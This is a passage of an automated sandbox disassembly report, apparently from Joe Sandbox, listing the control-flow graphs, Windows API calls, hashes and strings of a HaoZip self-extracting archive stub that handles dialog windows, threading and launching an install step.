                            • Part of subcall function 001E6D61: CommandLineToArgvW.SHELL32(?,?,?,?,00000000,?,?,?,?,?,?,001E622A,?,?), ref: 001E6D8C
                          • SetCurrentDirectoryW.KERNEL32(?,?,?), ref: 001E6239
                          • _wcslen.LIBCMT ref: 001E633A
                          • _wcslen.LIBCMT ref: 001E636B
                          • ShellExecuteExW.SHELL32(?), ref: 001E6515
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001E6558
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001E6564
                          • ShellExecuteW.SHELL32(00000000,002397B8,?,?,?,00000001), ref: 001E65C6
                          • _wcslen.LIBCMT ref: 001E6681
                          • MessageBoxW.USER32(?,?,?,00000000), ref: 001E66FF
                            • Part of subcall function 001F12C0: _wcslen.LIBCMT ref: 001F132D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$CurrentDirectory$ExecuteShell$ArgvCloseCommandHandleLineMessageObjectSingleWait_wcschr
                          • String ID: $.inf$install
                          • API String ID: 2805753210-3436187540
                          • Opcode ID: f18bfb70fd7a46f18131bb1260b2c664b44852fc23c3f0958407dcefd68bc01a
                          • Instruction ID: b47fd8c7550292c0df6608c1b0f5bda4e239802a9fbca34daddabdb8e09028b9
                          • Opcode Fuzzy Hash: f18bfb70fd7a46f18131bb1260b2c664b44852fc23c3f0958407dcefd68bc01a
                          • Instruction Fuzzy Hash: D2022B719026699BDF24EF65DD99BDDB3B8AF24340F6041EAE40DA2191DB306F88CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 456 1eac1f-1eac4f 457 1eae5d-1eae63 456->457 458 1eac55 456->458 461 1eae69-1eae6f 457->461 462 1eb035-1eb041 call 1ea5dd 457->462 459 1eac5b-1eac61 458->459 460 1ead92-1eade8 call 1e3449 call 1faa54 call 1e25a8 call 1e203f 458->460 463 1eafce-1eafd0 459->463 464 1eac67-1eac6d 459->464 533 1eadec-1eae22 call 1e25a8 call 21ef4e call 1e25a8 GetDlgItem 460->533 534 1eadea 460->534 467 1eafed-1eafef 461->467 468 1eae75-1eae7b 461->468 469 1eb043-1eb045 462->469 471 1eb046-1eb057 call 21af96 463->471 464->469 470 1eac73-1eac79 464->470 467->469 474 1eaff1-1eb011 call 1e8ab9 call 1e8b01 call 1e551e 467->474 475 1eafe2-1eafeb 468->475 476 1eae81-1eae87 468->476 469->471 477 1ead7f-1ead81 470->477 478 1eac7f-1eac86 470->478 526 1eb02a-1eb033 call 1e8ae1 474->526 527 1eb013-1eb021 474->527 475->471 482 1eae8d-1eae93 476->482 483 1eafd2-1eafdb call 1e9820 476->483 581 1ead83 call 1e9357 477->581 582 1ead83 call 1e9e02 477->582 484 1eacfe-1ead04 478->484 485 1eac88-1eac8e 478->485 482->463 490 1eae99-1eae9f 482->490 494 1eafe0 483->494 497 1ead06-1ead0c 484->497 498 1ead70 484->498 492 1eacdb-1eaced GetDlgItem 485->492 493 1eac90-1eac96 485->493 499 1eaead-1eaeb1 490->499 500 1eaea1-1eaea7 490->500 491 1ead86-1ead88 491->469 503 1ead8e-1ead90 491->503 492->463 507 1eacf3-1eacf9 492->507 504 1eac98-1eac9e 493->504 505 1eacc3-1eacd6 493->505 494->469 509 1ead0e-1ead16 497->509 510 1ead69-1ead6b 497->510 511 1ead71-1ead7a KiUserCallbackDispatcher 498->511 501 1eaeb7-1eaec2 IsWindow 499->501 502 1eafc3-1eafcc 499->502 500->463 500->499 501->502 514 1eaec8-1eaee2 501->514 502->471 503->511 504->463 515 1eaca4-1eacbe call 1eab81 504->515 505->469 507->471 512 1ead18-1ead21 call 1eab40 509->512 513 1ead33-1ead3b 509->513 510->498 511->469 512->469 536 1ead27-1ead2e call 1e9e02 512->536 521 1ead4f-1ead57 513->521 522 1ead3d-1ead4a PostMessageW 513->522 519 1eaef4-1eaf18 call 1eb05a call 1e23e5 call 1e203f 514->519 520 1eaee4-1eaee6 514->520 515->469 551 1eaf47-1eaf70 call 21ef4e call 1e25a8 GetDlgItem 519->551 561 1eaf1a-1eaf42 call 1e3449 call 1faa54 call 1e23e5 call 1e203f 519->561 520->519 529 1eaee8-1eaef2 call 1e1f8e 520->529 521->463 531 1ead5d-1ead64 call 1e9a2e 521->531 522->469 526->469 527->526 535 1eb023-1eb025 call 1eb791 527->535 529->551 531->469 562 1eae4f-1eae58 call 1e203f 533->562 563 1eae24-1eae49 SendMessageW PostMessageW 533->563 534->533 535->526 536->469 568 1eafaa-1eafb1 551->568 569 1eaf72-1eaf7b IsWindow 551->569 561->551 562->469 563->562 573 1eafba-1eafbe call 1e203f 568->573 574 1eafb3-1eafb5 call 1eb791 568->574 569->568 572 1eaf7d-1eafa4 SendMessageW PostMessageW 569->572 572->568 573->502 574->573 581->491 582->491
                          APIs
                          • GetDlgItem.USER32(?,000003EB), ref: 001EACE3
                            • Part of subcall function 001EAB81: GetDlgItem.USER32(?,000003EE), ref: 001EAB8D
                            • Part of subcall function 001EAB81: __aulldiv.LIBCMT ref: 001EABD2
                            • Part of subcall function 001EAB81: PostMessageW.USER32(00000000,00000402,00000000,?), ref: 001EABDE
                          • KiUserCallbackDispatcher.NTDLL(?,00000002), ref: 001EAD74
                          • _wcslen.LIBCMT ref: 001EADFF
                          • GetDlgItem.USER32(?,000003EB), ref: 001EAE18
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001EAE3A
                          • PostMessageW.USER32(00000000,00000115,00000007,00000000), ref: 001EAE49
                          • IsWindow.USER32(00000000), ref: 001EAEBA
                          • _wcslen.LIBCMT ref: 001EAF4D
                          • GetDlgItem.USER32(00000000,000003EB), ref: 001EAF66
                          • IsWindow.USER32(00000000), ref: 001EAF73
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001EAF94
                          • PostMessageW.USER32(00000000,00000115,00000007,00000000), ref: 001EAFA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Message$Item$Post$SendWindow_wcslen$CallbackDispatcherUser__aulldiv
                          • String ID: ...
                          • API String ID: 1098214739-214521349
                          • Opcode ID: d196aeac0b57e7ac37560c0978efce6ecf0c115517a5ae91a37995b15c4018ee
                          • Instruction ID: 67f7e222563a4680e3308369fe868ff4984c9f14e1ddf4a7162d340220a8f956
                          • Opcode Fuzzy Hash: d196aeac0b57e7ac37560c0978efce6ecf0c115517a5ae91a37995b15c4018ee
                          • Instruction Fuzzy Hash: B9A10371608B809BC728AB66C8A9B6F77E9AF94700F40092DF49687191EB38E945C713

                          Control-flow Graph

                          APIs
                          • SetWindowTextW.USER32(?,?), ref: 001E9869
                          • GetDlgItem.USER32(?,000003EB), ref: 001E98D3
                          • _wcslen.LIBCMT ref: 001E98E9
                          • IsWindow.USER32(00000000), ref: 001E9902
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001E9920
                          • IsWindow.USER32(00000000), ref: 001E993B
                          • PostMessageW.USER32(00000000,00000115,00000007,00000000), ref: 001E994F
                          • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 001E9992
                          • GetDlgItem.USER32(?,000003EE), ref: 001E99A2
                          • IsWindow.USER32(00000000), ref: 001E99AF
                          • PostMessageW.USER32(00000000,00000402,00000064,00000000), ref: 001E99C2
                          • GetDlgItem.USER32(?,000003EA), ref: 001E99D0
                          • IsWindow.USER32(00000000), ref: 001E99DD
                          • SetWindowTextW.USER32(00000000,?), ref: 001E9A09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Window$Message$ItemPost$Text$Send_wcslen
                          • String ID:
                          • API String ID: 3913434370-0
                          • Opcode ID: 270086eb744b28c6e7fe6451c5a527f989270cb8b66ef238d059f7550fc5bbf8
                          • Instruction ID: 86f7c2e751dd162e7d7188c7325eff55a5aa185c31dec9612431008154f31e88
                          • Opcode Fuzzy Hash: 270086eb744b28c6e7fe6451c5a527f989270cb8b66ef238d059f7550fc5bbf8
                          • Instruction Fuzzy Hash: 1F51A370A00A4ABFDB15EBB2EC9DBEEF7B8BF14304F100129F515A6092DB749945CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 649 1e9e02-1e9e0c 650 1e9e0e-1e9e14 649->650 651 1e9e22-1e9e2e call 1e9b6d 649->651 650->651 652 1e9e16-1e9e1b call 1e9b6d 650->652 657 1e9e34-1e9e37 651->657 658 1e9ee3-1e9eed 651->658 652->651 659 1e9e5a-1e9e64 657->659 660 1e9e39-1e9e3c 657->660 661 1e9eef 658->661 662 1e9ef1-1e9f0d SetWindowTextW GetDlgItem 658->662 663 1e9e68-1e9e86 SetWindowTextW GetDlgItem 659->663 664 1e9e66 659->664 666 1e9f21-1e9f24 660->666 667 1e9e42-1ea4f7 call 1e9593 call 1e97b1 call 1e336e call 1e23e5 call 1e203f GetDlgItem 660->667 661->662 665 1e9f0f-1e9f19 662->665 662->666 670 1e9e9a-1e9eaf call 1e9f25 GetDlgItem 663->670 671 1e9e88-1e9e92 663->671 664->663 668 1e9f1d-1e9f1f SetWindowTextW 665->668 669 1e9f1b 665->669 692 1ea4f9-1ea4ff 667->692 693 1ea513-1ea56f call 1e1f8e 667->693 668->666 669->668 679 1e9ec3-1e9ecf GetDlgItem 670->679 680 1e9eb1-1e9ebb 670->680 673 1e9e96-1e9e98 SetWindowTextW 671->673 674 1e9e94 671->674 673->670 674->673 679->666 684 1e9ed1-1e9ee1 SendMessageW 679->684 682 1e9ebf-1e9ec1 SetWindowTextW 680->682 683 1e9ebd 680->683 682->679 683->682 684->666 692->693 694 1ea501-1ea50d SetWindowTextW 692->694 697 1ea583-1ea5b4 call 21b1a7 call 1f5a70 call 1e84a6 call 1f5c10 693->697 698 1ea571-1ea575 693->698 694->693 708 1ea5ce-1ea5dc call 21af96 697->708 709 1ea5b6-1ea5c8 SetTimer 697->709 698->697 699 1ea577-1ea57e 698->699 699->697 709->708
                          APIs
                          • SetWindowTextW.USER32(?,?), ref: 001E9E72
                          • GetDlgItem.USER32(?,000003EB), ref: 001E9E82
                          • SetWindowTextW.USER32(00000000,?), ref: 001E9E98
                          • GetDlgItem.USER32(?,000003EC), ref: 001E9EAB
                          • SetWindowTextW.USER32(00000000,?), ref: 001E9EC1
                          • GetDlgItem.USER32(?,000003EE), ref: 001E9ECB
                          • SendMessageW.USER32(00000000,00000406,00000000,00000064), ref: 001E9EDB
                            • Part of subcall function 001E9B6D: GetDlgItem.USER32(?,000003E9), ref: 001E9BDD
                            • Part of subcall function 001E9B6D: SetWindowTextW.USER32(?,?), ref: 001E9C0A
                            • Part of subcall function 001E9B6D: KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 001E9C14
                            • Part of subcall function 001E9B6D: GetDlgItem.USER32(?,000003EA), ref: 001E9C2A
                            • Part of subcall function 001E9B6D: SetWindowTextW.USER32(?,?), ref: 001E9C57
                            • Part of subcall function 001E9B6D: EnableWindow.USER32(?,00000001), ref: 001E9C62
                            • Part of subcall function 001E9B6D: GetDlgItem.USER32(?,000003EC), ref: 001E9C78
                            • Part of subcall function 001E9B6D: KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 001E9C80
                            • Part of subcall function 001E9B6D: GetDlgItem.USER32(?,000003ED), ref: 001E9C8E
                            • Part of subcall function 001E9B6D: EnableWindow.USER32(00000000,00000000), ref: 001E9C9A
                          • SetWindowTextW.USER32(?,?), ref: 001E9EFB
                          • GetDlgItem.USER32(?,000003EB), ref: 001E9F05
                          • SetWindowTextW.USER32(00000000), ref: 001E9F1F
                          • GetDlgItem.USER32(?,000003EB), ref: 001EA4ED
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EA50D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Window$Item$Text$CallbackDispatcherEnableUser$MessageSend
                          • String ID:
                          • API String ID: 2377662985-0
                          • Opcode ID: d3c5a7759f6c13e03148c7c2e3734f4e854e02df8d8cdf6ce513123fc07c43b5
                          • Instruction ID: 6cc30f5db683b530c29fcbfaf84b21b31f26eee4b08f64503dfb51b4c8578039
                          • Opcode Fuzzy Hash: d3c5a7759f6c13e03148c7c2e3734f4e854e02df8d8cdf6ce513123fc07c43b5
                          • Instruction Fuzzy Hash: 8261D370300B85ABDB29EF65DC99AAEB7A9FF45701F00012DF61697191DB70A904CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 712 1e9f25-1e9f63 713 1e9f78-1e9f7b 712->713 714 1e9f65-1e9f6c 712->714 717 1e9fcf-1e9fd7 713->717 718 1e9f7d-1e9fa8 call 1e336e call 1e23e5 call 1e203f 713->718 715 1e9f6e 714->715 716 1e9f70-1e9f73 714->716 715->716 716->713 721 1e9f75 716->721 719 1ea00d-1ea022 GetCurrentDirectoryW 717->719 720 1e9fd9-1ea00b call 1e3366 call 1ec210 call 21ef4e call 1e25a8 717->720 745 1e9fae-1e9fca call 1f1f00 call 1edd80 718->745 746 1ea124-1ea131 718->746 724 1ea024-1ea026 719->724 725 1ea050-1ea072 call 1f1f00 call 1edd80 call 1e203f 719->725 748 1ea077-1ea07a 720->748 721->713 724->725 728 1ea028-1ea04e call 21ef4e call 1e206a 724->728 725->748 728->748 765 1ea119-1ea11f call 1e203f 745->765 751 1ea139-1ea147 call 1e1f8e 746->751 752 1ea133 746->752 748->746 753 1ea080-1ea114 call 1e241c call 1ec180 call 1ec210 call 21ef4e call 1e25a8 * 2 call 1ec210 call 21ef4e call 1e25a8 748->753 762 1ea30f-1ea321 751->762 763 1ea14d-1ea153 751->763 752->751 753->765 766 1ea329-1ea35a call 1e336e call 1e23e5 call 1e203f * 2 call 21af96 762->766 767 1ea323 762->767 763->762 768 1ea159-1ea15c 763->768 765->746 767->766 768->762 772 1ea162-1ea168 768->772 772->762 775 1ea16e-1ea1ab call 1e51c0 call 1e1fbc call 1e5274 call 1e203f 772->775 801 1ea302-1ea30d call 1e5264 775->801 802 1ea1b1-1ea23f call 1e1f8e call 1ec2d0 call 1ec140 * 2 call 1e1fbc call 1e52c9 775->802 801->762 819 1ea244-1ea246 802->819 820 1ea26b 819->820 821 1ea248-1ea24f 819->821 823 1ea26d-1ea27a call 1e203f 820->823 821->820 822 1ea251-1ea264 call 1ebfd0 821->822 822->820 828 1ea266-1ea269 822->828 829 1ea2ec-1ea2fd call 1e203f * 2 823->829 830 1ea27c-1ea28e GetDlgItem 823->830 828->823 829->801 832 1ea2da-1ea2e7 call 1e1f8e 830->832 833 1ea290-1ea294 830->833 832->829 833->832 836 1ea296-1ea2d8 SendMessageW * 2 833->836 836->832
                          APIs
                          • _wcslen.LIBCMT ref: 001E9FF8
                          • GetCurrentDirectoryW.KERNEL32(00000208,?,00000001,?,00000000), ref: 001EA01A
                          • _wcslen.LIBCMT ref: 001EA035
                          • _wcslen.LIBCMT ref: 001EA0B6
                          • _wcslen.LIBCMT ref: 001EA106
                          • GetDlgItem.USER32(?,000003EC), ref: 001EA284
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001EA2B9
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001EA2D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$MessageSend$CurrentDirectoryItem
                          • String ID: /\ $Software\HaoZip SFX
                          • API String ID: 3049140925-2012402492
                          • Opcode ID: 534b04611b9dd0bcfb60efbff4c955901904010af3a9ad76abe073b036a362d8
                          • Instruction ID: 752a39ef80fad5b98f93ebb0ccbeb590f1f237c4f76776c6100401eb5617676f
                          • Opcode Fuzzy Hash: 534b04611b9dd0bcfb60efbff4c955901904010af3a9ad76abe073b036a362d8
                          • Instruction Fuzzy Hash: C8B142B19009999BCB24EB51CD95BEDB378BF50305F8040E9E60966092EB707F8CCF99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 838 1f5600-1f56bc call 21b1a7 InitializeCriticalSection call 21ef4e 843 1f56be-1f56e3 call 21c190 838->843 844 1f56e8-1f56ee 838->844 856 1f57d5-1f57f2 call 1fa3c0 843->856 846 1f56f4-1f56ff 844->846 847 1f5852 call 1e2330 844->847 848 1f5708-1f5715 846->848 849 1f5701-1f5706 846->849 855 1f5857 call 21f174 847->855 853 1f571e-1f5723 848->853 854 1f5717-1f571c 848->854 852 1f5726-1f5731 849->852 857 1f5738-1f573e 852->857 858 1f5733-1f5736 852->858 853->852 854->852 862 1f585c-1f58b3 call 21f174 855->862 869 1f57f4-1f5806 856->869 870 1f5822-1f5851 856->870 861 1f5740-1f5756 call 21b1a7 857->861 863 1f5767-1f5769 857->863 858->861 861->855 880 1f575c-1f5765 861->880 878 1f58ba-1f58c9 InterlockedExchangeAdd 862->878 879 1f58b5-1f58b8 InterlockedExchangeAdd 862->879 867 1f576b-1f5776 call 21b1a7 863->867 868 1f5778 863->868 871 1f577a-1f579e call 21c710 867->871 868->871 875 1f5818-1f581f call 21b1d7 869->875 876 1f5808-1f5816 869->876 887 1f57d2 871->887 888 1f57a0-1f57b2 871->888 875->870 876->862 876->875 885 1f58cb-1f58cd 878->885 886 1f58d2-1f58e9 878->886 879->878 880->871 885->886 889 1f58fb-1f5904 886->889 890 1f58eb-1f58ef 886->890 887->856 893 1f57c8-1f57cf call 21b1d7 888->893 894 1f57b4-1f57c2 888->894 891 1f5906-1f590d SetEvent 889->891 892 1f5910-1f5916 889->892 890->889 895 1f58f1-1f58f8 EnterCriticalSection 890->895 891->892 896 1f592d-1f5932 892->896 897 1f5918-1f591c 892->897 893->887 894->855 894->893 895->889 901 1f593b-1f5947 896->901 902 1f5934-1f5936 call 1ea644 896->902 899 1f591e-1f5925 LeaveCriticalSection 897->899 900 1f5928-1f592a 897->900 899->900 900->896 904 1f5949-1f594d 901->904 905 1f5956-1f5976 901->905 906 1f5938 902->906 904->905 907 1f594f-1f5950 EnterCriticalSection 904->907 908 1f5999-1f599b 905->908 909 1f5978-1f597a 905->909 906->901 907->905 910 1f599d-1f59a1 908->910 911 1f59b0-1f59c0 call 1e84a6 908->911 912 1f597c-1f5980 909->912 913 1f5992-1f5997 909->913 916 1f59ab-1f59ad 910->916 917 1f59a3-1f59a4 910->917 922 1f59d6-1f59dc 911->922 923 1f59c2-1f59c6 911->923 914 1f598d-1f598f 912->914 915 1f5982-1f598a 912->915 913->911 914->913 915->914 916->911 917->916 926 1f59de-1f59e2 922->926 927 1f59f2-1f5a1e call 1e849b call 21af96 922->927 924 1f59cf 923->924 925 1f59c8-1f59c9 LeaveCriticalSection 923->925 924->922 925->924 928 1f59eb 926->928 929 1f59e4-1f59e5 LeaveCriticalSection 926->929 928->927 929->928
                          APIs
                          • InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,?,00000000,0022EB79,000000FF,?,001F5ACD,?,?), ref: 001F563B
                          • _wcslen.LIBCMT ref: 001F56AA
                            • Part of subcall function 001E2330: std::_Xinvalid_argument.LIBCPMT ref: 001E2335
                          • InterlockedExchangeAdd.KERNEL32(00000000,00000001), ref: 001F58B8
                          • InterlockedExchangeAdd.KERNEL32(00000000,000000FF), ref: 001F58C4
                          • EnterCriticalSection.KERNEL32 ref: 001F58F2
                          • SetEvent.KERNEL32(?), ref: 001F5907
                          • LeaveCriticalSection.KERNEL32(?), ref: 001F591F
                          • EnterCriticalSection.KERNEL32(?), ref: 001F5950
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001F59C9
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001F59E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked$EventInitializeXinvalid_argument_wcslenstd::_
                          • String ID:
                          • API String ID: 2466940856-0
                          • Opcode ID: 8f05968ddbff853a243529c1b54a376a9a884c1f8bfba9e91dfcddd6dadf6c0a
                          • Instruction ID: 28cbc1ac16d9509b18627400b91fffc6c44406e63e7c7ac2b8c6a63ae6c09b60
                          • Opcode Fuzzy Hash: 8f05968ddbff853a243529c1b54a376a9a884c1f8bfba9e91dfcddd6dadf6c0a
                          • Instruction Fuzzy Hash: 66D1D371900609DFDB18DF68D884BAEBBF5BF45324F20426DEA25EB391D7749900CBA0

                          Control-flow Graph

                          APIs
                          • SetWindowTextW.USER32(?,?), ref: 001E95DB
                          • GetDlgItem.USER32(?,000003EC), ref: 001E95FF
                          • IsWindow.USER32(00000000), ref: 001E9612
                          • GetWindowTextW.USER32(00000000,?,00000104), ref: 001E9625
                          • _wcslen.LIBCMT ref: 001E963C
                          • IsWindow.USER32(00000000), ref: 001E9658
                          • SetWindowTextW.USER32(00000000,?), ref: 001E9671
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Window$Text$Item_wcslen
                          • String ID: Software\HaoZip SFX
                          • API String ID: 757413937-3997018891
                          • Opcode ID: ee585ec7135d58f6ee33257238f96772b058f5ec95c99e6f5928f019127b9d8f
                          • Instruction ID: 1e703e9bc4cd1848ea1faf71ac17e560446fb473fa77896251ae7e35b0766441
                          • Opcode Fuzzy Hash: ee585ec7135d58f6ee33257238f96772b058f5ec95c99e6f5928f019127b9d8f
                          • Instruction Fuzzy Hash: 51516275910A589BDB25FB21DCDDBEE73B8BF54300F4001A9E50A96191EF30AE89CF61

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: %03d$001$haozip%.2d.7z$sfxv
                          • API String ID: 176396367-1215480101
                          • Opcode ID: ae9fc7bdd613a4dee5cc9eeabfb0215c0a95674b807fb1adb07d2923a4d91fc2
                          • Instruction ID: ff4c5d29a5e5b4860fd60db4656b532160a5ef87fdc13cd29ac0300287868874
                          • Opcode Fuzzy Hash: ae9fc7bdd613a4dee5cc9eeabfb0215c0a95674b807fb1adb07d2923a4d91fc2
                          • Instruction Fuzzy Hash: 7631A2B12187415FC711EF25DC5AA6FB3EDFFD4710F00491EF86582182DB7099558B92

                          Control-flow Graph

                          • Executed
                          • Not Executed
